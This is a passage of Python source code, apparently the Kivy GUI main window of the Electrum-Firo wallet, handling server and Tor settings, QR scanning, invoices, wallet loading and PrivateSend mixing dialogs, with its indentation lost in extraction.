#Factory.register('OutputItem', module='electrum_firo.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
from .uix.dialogs.dash_kivy import TorWarnDialog
from .uix.dialogs.warn_dialog import WarnDialog
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_firo_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_firo.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_firo.util import (NoDynamicFeeEstimates, NotEnoughFunds,
FIRO_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME,
UserFacingException)
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_firo.simple_config import SimpleConfig
from electrum_firo.plugin import Plugins
from electrum_firo.paymentrequest import PaymentRequest
ATLAS_ICON = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/%s'
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on_bp = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on_bp = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on_bp, True)
fiat_bypass_tor_bp = BooleanProperty()
def toggle_fiat_bypass_tor(self, x):
self.fiat_bypass_tor_bp = \
not self.electrum_config.get('fiat_bypass_tor', False)
self.electrum_config.set_key('fiat_bypass_tor',
self.fiat_bypass_tor_bp, True)
coro = self.network.restart()
self.network.run_from_another_thread(coro)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme in [FIRO_BIP21_URI_SCHEME, PAY_BIP21_URI_SCHEME]:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
self.is_android = ('ANDROID_DATA' in os.environ)
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on_bp = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._trigger_update_readiness = Clock.create_trigger(self.update_readiness, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._plugins_dialog = None
self._settings_dialog = None
self._dash_net_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum_firo.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
data_l = data.lower()
if (data_l.startswith(FIRO_BIP21_URI_SCHEME + ':')
or data_l.startswith(PAY_BIP21_URI_SCHEME + ':')):
self.set_URI(data)
return
# try to decode transaction
from electrum_firo.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def run_other_app(self, app_name):
if not self.is_android:
return f'Can not start {app_name}, not android system'
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
pm = autoclass('android.content.pm.PackageManager')
activity = PythonActivity.mActivity
pm_ = activity.getPackageManager()
array_pkg = pm_.getInstalledApplications(pm.GET_META_DATA).toArray()
selected_pkg = []
for i in array_pkg:
if "/data/app/" not in getattr(i, "publicSourceDir"):
continue
selected_pkg.append(i)
app_to_launch = app_name
found = False
for i in selected_pkg:
if app_to_launch == getattr(i, "packageName"):
found = True
try:
package_name = getattr(i, "packageName")
app_intent = pm_.getLaunchIntentForPackage(package_name)
app_intent.setAction(Intent.ACTION_VIEW)
app_intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
activity.startActivity(app_intent)
def _run_task(activity, app_intent):
time.sleep(0.25)
activity.startActivity(app_intent)
args = (activity, app_intent)
threading.Thread(target=_run_task, args=args).start()
except Exception as e:
return f'Error on lauhcing {app_name}: {str(e)}'
if not found:
return f'App {app_name} not found'
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.dash.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_firo import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for dash: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified',
'verified-islock', 'excessive-resource-usage']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_mn_list_updated,
['mn-list-diff-updated',
'mn-list-info-updated'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.show_backup_msg()
def show_backup_msg(self):
w = self.wallet
if w and getattr(w.storage, 'backup_message', None):
WarnDialog(w.storage.backup_message, title=_('Information')).open()
w.storage.backup_message = ''
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
def continue_load():
self._load_wallet_by_name(path)
if (self.electrum_config.get('tor_auto_on', True)
and not self.network.detect_tor_proxy()):
TorWarnDialog(self, path, continue_load).open()
else:
continue_load()
def _load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
if db.upgrade_done:
storage.backup_old_version()
if db.check_unfinished_multisig():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.continue_multisig_setup(storage)
else:
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.history_screen.stop_get_data_thread()
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
util.unregister_callback(self.on_ps_callback)
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
if key == 27 and self.is_exit:
if self.wallet:
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if is_mixing and not is_waiting:
def on_want_exit(b):
if b:
from kivy.base import stopTouchApp
stopTouchApp()
d = Question(psman.WAIT_MIXING_STOP_MSG, on_want_exit)
d.open()
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def plugins_dialog(self):
from .uix.dialogs.plugins import PluginsDialog
if self._plugins_dialog is None:
self._plugins_dialog = PluginsDialog(self)
self._plugins_dialog.update()
self._plugins_dialog.open()
def dash_net_dialog(self):
from .uix.dialogs.dash_net import DashNetDialog
if self._dash_net_dialog is None:
self._dash_net_dialog = DashNetDialog(self)
self._dash_net_dialog.update()
self._dash_net_dialog.open()
def privatesend_dialog(self):
if self.wallet.psman.unsupported:
from .uix.dialogs.privatesend import PSDialogUnsupportedPS as psdlg
else:
from .uix.dialogs.privatesend import PSDialog as psdlg
psdlg(self).open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'plugins':
self.plugins_dialog()
elif name == 'dash_net':
self.dash_net_dialog()
elif name == 'privatesend':
self.privatesend_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_firo.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_firo.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_firo_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_firo_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
if self.testnet:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash-testnet.png"
else:
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-dash.png"
self.root.ids.ps_button.icon = self.ps_icon()
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
self._trigger_update_readiness()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
self._trigger_update_readiness()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
wallet, tx = args
if wallet.psman.need_notify(tx.txid()):
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
elif event == 'verified-islock':
self._trigger_update_wallet()
elif event == 'excessive-resource-usage':
self.show_info(args[0])
def on_ps_callback(self, event, *args):
Clock.schedule_once(lambda dt: self.on_ps_event(event, *args))
def on_ps_event(self, event, *args):
psman = self.wallet.psman
is_mixing = (psman.state in psman.mixing_running_states)
is_waiting = psman.is_waiting if is_mixing else False
if event == 'ps-data-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
if event == 'ps-reserved-changes':
wallet = args[0]
if wallet == self.wallet:
self._trigger_update_wallet()
elif event in ['ps-state-changes', 'ps-wfl-changes',
'ps-keypairs-changes']:
wallet, msg, msg_type = (*args, None, None)[:3]
if wallet == self.wallet:
self.update_ps_btn(is_mixing, is_waiting)
if msg:
if msg_type and msg_type.startswith('inf'):
self.show_info(msg)
else:
WarnDialog(msg, title=_('PrivateSend')).open()
elif event == 'ps-not-enough-sm-denoms':
wallet, denoms_by_vals = args
if wallet == self.wallet:
q = psman.create_sm_denoms_data(confirm_txt=True)
def create_small_denoms(confirmed):
if confirmed:
self.create_small_denoms(denoms_by_vals)
d = Question(q, create_small_denoms)
d.open()
elif event == 'ps-other-coins-arrived':
wallet, txid = args
if wallet == self.wallet:
q = '\n\n'.join([psman.OTHER_COINS_ARRIVED_MSG1.format(txid),
psman.OTHER_COINS_ARRIVED_MSG2,
psman.OTHER_COINS_ARRIVED_MSG3,
psman.OTHER_COINS_ARRIVED_MSG4,
psman.OTHER_COINS_ARRIVED_Q])
def show_coins_dialog(confirmed):
if confirmed:
self.coins_dialog(1)
d = Question(q, show_coins_dialog)
d.open()
def create_small_denoms(self, denoms_by_vals):
w = self.wallet
psman = w.psman
coins = psman.get_biggest_denoms_by_min_round()
if not coins:
msg = psman.create_sm_denoms_data(no_denoms_txt=True)
self.show_error(msg)
self.create_new_denoms(coins[0:1])
def create_new_denoms(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new denoms transactions'),
self._create_new_denoms, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_denoms_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_denoms(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_denoms_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Denoms workflow with'
f' txids: {", ".join(wfl.tx_order)}')
def create_new_collateral(self, coins):
def on_q_answered(confirmed):
if confirmed:
self.protected(_('Enter your PIN code to sign'
' new collateral transactions'),
self._create_new_collateral, (coins,))
w = self.wallet
psman = w.psman
info = psman.new_collateral_from_coins_info(coins)
q = _('Do you want to create transactions?\n\n{}').format(info)
d = Question(q, on_q_answered)
d.open()
def _create_new_collateral(self, coins, password):
w = self.wallet
psman = w.psman
wfl, err = psman.create_new_collateral_wfl_from_gui(coins, password)
if err:
self.show_error(err)
else:
self.show_info(f'Created New Collateral workflow with'
f' txids: {", ".join(wfl.tx_order)}')
def update_ps_btn(self, is_mixing, is_waiting):
ps_button = self.root.ids.ps_button
ps_button.icon = self.ps_icon(active=is_mixing, is_waiting=is_waiting)
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
util.register_callback(self.on_ps_callback,
['ps-data-changes',
'ps-reserved-changes',
'ps-not-enough-sm-denoms',
'ps-other-coins-arrived',
'ps-wfl-changes',
'ps-keypairs-changes',
'ps-state-changes'])
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
balance_sat = c + u + x
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self, is_ps=False):
from electrum_firo.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
min_rounds = None if not is_ps else self.wallet.psman.mix_rounds
include_ps = (min_rounds is None)
inputs = self.wallet.get_spendable_coins(None,
include_ps=include_ps,
min_rounds=min_rounds)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs,
min_rounds=min_rounds)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
